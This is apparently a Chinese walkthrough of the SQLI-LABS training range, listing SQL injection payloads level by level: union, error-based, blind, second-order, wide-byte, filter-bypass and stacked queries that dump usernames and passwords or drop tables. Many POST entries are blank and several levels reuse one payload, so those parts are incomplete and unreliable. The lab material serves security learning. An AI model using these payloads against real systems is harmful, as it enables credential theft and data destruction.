【靶场】SQLI-LABS通关攻略
前言
SQLI-LABS通关攻略
Page-1 (Basic Challenges)
Less-1
1 | GET /Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+ |
- 先用 `order by 3` / `order by 4` 确定查询列数为 3,再把 `id` 置为不存在的值(-1)让 union 的结果显示出来;`--+` 中的 `+` 在 URL 中解码为空格,保证 `--` 注释生效。
Less-2
1 | GET /Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users --+ |
Less-3
1 | GET /Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+ |
Less-4
1 | GET /Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+ |
Less-5
1 | GET /Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+ |
- 报错注入:updatexml 的 XPath 报错信息最多回显 32 个字符,数据较长时需用 `substr()` / `limit` 分段读取。
Less-6
1 | GET /Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+ |
Less-7
1 | GET /Less-7/?id=1')) and ascii(substr((select database()),1,1))=115 --+ |
- 布尔盲注:115 是字符 `s` 的 ASCII 码。逐位改变 substr 的起始位置和比较值(或用二分法缩小范围)即可枚举出库名;表名、字段名和数据同理。
Less-8
1 | GET /Less-8/?id=1' and ascii(substr((select database()),1,1))=115 --+ |
Less-9
1 | GET /Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+ |
- 时间盲注:页面没有任何回显差异,只能靠响应延时判断。sleep 的秒数应明显高于正常响应时间,并对同一条件重复几次,避免网络抖动造成误判。
Less-10
1 | GET /Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+ |
Less-11
1 | POST /Less-11/ |
Less-12
1 | POST /Less-12/ |
Less-13
1 | POST /Less-13/ |
Less-14
1 | POST /Less-14/ |
Less-15
1 | POST /Less-15/ |
Less-16
1 | POST /Less-16/ |
Less-17
1 | POST /Less-17/ |
Less-18
- User-Agent 头注入
1 | POST /Less-18/ |
Less-19
1 | POST /Less-19/ |
Less-20
1 | GET /Less-20/index.php |
Page-2 (Advanced Injections)
Less-21
1 | GET /Less-21/index.php |
Less-22
1 | GET /Less-22/index.php |
Less-23
1 | GET /Less-23/?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),3 or '1'='1 |
Less-24
- 注册用户 `admin'#`
- 以 `admin'#` 登录
- 修改 `admin'#` 用户的密码
- 退出登录
- 以 `admin` 用户登录,密码就是刚才给 `admin'#` 设置的新密码
- 原理(二次注入):注册时用户名经过转义安全入库,但修改密码时从数据库取出的用户名被直接拼进 UPDATE 语句,`#` 把 WHERE 子句后面的条件注释掉,实际被更新的是 `admin` 的密码。
—
Less-25
- 过滤 or/and,用 && || 代替
1 | ?id=-1' && 1=2 union select 1,2,3 && '1'='1 |
- 注意结尾不要再写 `and '1'='1`:按本关的过滤规则 `and` 同样会被删掉,可能导致语句语法错误;改用 `&& '1'='1` 收尾,或直接用 `--+` 注释掉后面的内容。
Less-25a
- 过滤空格 or/and
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1 |
Less-26
- 过滤空格、注释、or/and
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1 |
Less-26a
- 过滤注释符 `/*`、`#`、`--` 以及空格,用 `%0a`(换行)代替空格
1 | ?id=-1'%0aunion%0aselect%0a1,2,3%0aand%0a'1'='1 |
Less-27
- 过滤 union select
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1 |
Less-27a
- 过滤大小写关键字
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1 |
Less-28
- 过滤 union select 注释
1 | ?id=-1' uNioN sElEcT 1,2,3 and '1'='1 |
Less-28a
- 多层过滤关键字
1 | ?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1 |
Less-29
- 过滤空格,保留引号
1 | ?id=-1'%09union%09select%091,2,3%09and%09'1'='1 |
Less-30
- 数字型过滤空格
1 | ?id=-1%09union%09select%091,2,3 |
Less-31
- 双引号过滤空格
1 | ?id=-1"%09union%09select%091,2,3%09and%09"1"="1 |
Less-32
- 宽字节注入:GBK 编码下用 %df 绕过 addslashes
1 | ?id=-1%df' union select 1,2,group_concat(username,0x3a,password) from users --+ |
- 原理:addslashes 在单引号前加上 `\`(0x5c),而数据库连接使用 GBK 时 `%df%5c` 会被当成一个双字节汉字,转义用的反斜杠被"吃掉",单引号重新生效。该技巧只在服务端以 GBK 等多字节字符集处理输入时有效。
Less-33
- 宽字节 mysql_real_escape_string
1 | ?id=-1%df' union select 1,2,3 --+ |
Less-34
- 宽字节 POST 注入
1 | uname 参数: |
Less-35
- 数字型无转义宽字节无影响
1 | ?id=-1 union select 1,2,3 --+ |
Less-36
- 单引号 mysql_real_escape_string 宽字节
1 | ?id=-1%df' union select 1,2,3 --+ |
Less-37
- POST 宽字节注入
1 | uname: |
Page-3 (Stacked Injections)
Less-38
- 堆叠注入:用 `;` 拼接多条语句
1 | ?id=1';select group_concat(username,0x3a,password) from users;--+ |
- 页面通常只回显第一条语句的结果,第二条 select 的查询结果一般看不到;要确认堆叠是否成功,更可靠的做法是执行有副作用的语句(如后面几关的 create / insert / update),再通过正常功能观察变化。
Less-39
- 数字型堆叠注入
1 | ?id=1;select group_concat(username,0x3a,password) from users;--+ |
Less-40
- `')` 闭合堆叠注入
1 | ?id=1');select group_concat(username,0x3a,password) from users;--+ |
Less-41
- 无过滤数字堆叠
1 | ?id=1;create table hack like users;--+ |
Less-42
- `")` 堆叠注入
1 | ?id=1");select database();--+ |
Less-43
- `')` 堆叠注入
1 | ?id=1');show tables;--+ |
Less-44
- 双引号堆叠
1 | ?id=1");select user();--+ |
Less-45
- `')` 堆叠注入
1 | ?id=1');select group_concat(table_name) from information_schema.tables where table_schema=database();--+ |
Less-46
- 数字堆叠无过滤
1 | ?id=1;drop table if exists test;create table test(id int);--+ |
- drop / create 是破坏性操作,仅适用于靶场;真实授权测试中应改用无副作用或可回滚的语句(例如只 insert 一条标记数据)来验证堆叠注入。
Less-47
- 单引号堆叠,过滤注释
1 | ?id=1';select database() and '1'='1 |
Less-48
- 过滤 `#`、`--` 注释的堆叠注入,用 `and '1'='1` 闭合
1 | ?id=1';select database() and '1'='1 |
Less-49
- 堆叠 + 空格过滤
1 | ?id=1';%09select%09database()%09and%09'1'='1 |
Less-50
- 数字堆叠空格过滤
1 | ?id=1;%09select%09database() |
Less-51
- POST 堆叠注入
1 | uname: |
Less-52
- POST 数字堆叠
1 | uname: |
Less-53
- POST `')` 堆叠
1 | uname: |
Page-4 (Challenges)
Less-54
- 随机闭合 + 过滤关键字盲注
1 | ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),1) and '1'='1 |
Less-55
- 随机 `')` 闭合过滤
1 | ?id=1') and if(ascii(substr(database(),1,1))=115,sleep(2),1) and ('1'='1 |
Less-56
- 随机 `"` 闭合过滤
1 | ?id=1" and if(ascii(substr(database(),1,1))=115,sleep(2),1) and "1"="1 |
Less-57
- 随机数字型过滤
1 | ?id=1 and if(ascii(substr(database(),1,1))=115,sleep(2),1) |
Less-58
- 单引号无注释严格过滤
1 | ?id=-1' uNioN sElEcT 1,2,3 and '1'='1 |
Less-59
- 双引号无注释过滤
1 | ?id=-1" uNioN sElEcT 1,2,3 and "1"="1 |
Less-60
- 数字型无注释过滤
1 | ?id=-1 uNioN sElEcT 1,2,3 |
Less-61
- POST 单引号随机过滤盲注
1 | uname: |
Less-62
- POST `')` 闭合盲注
1 | uname: |
Less-63
- POST `"` 闭合盲注
1 | uname: |
Less-64
- POST 数字盲注
1 | uname: |
Less-65
- POST `")` 闭合过滤盲注
1 | uname: |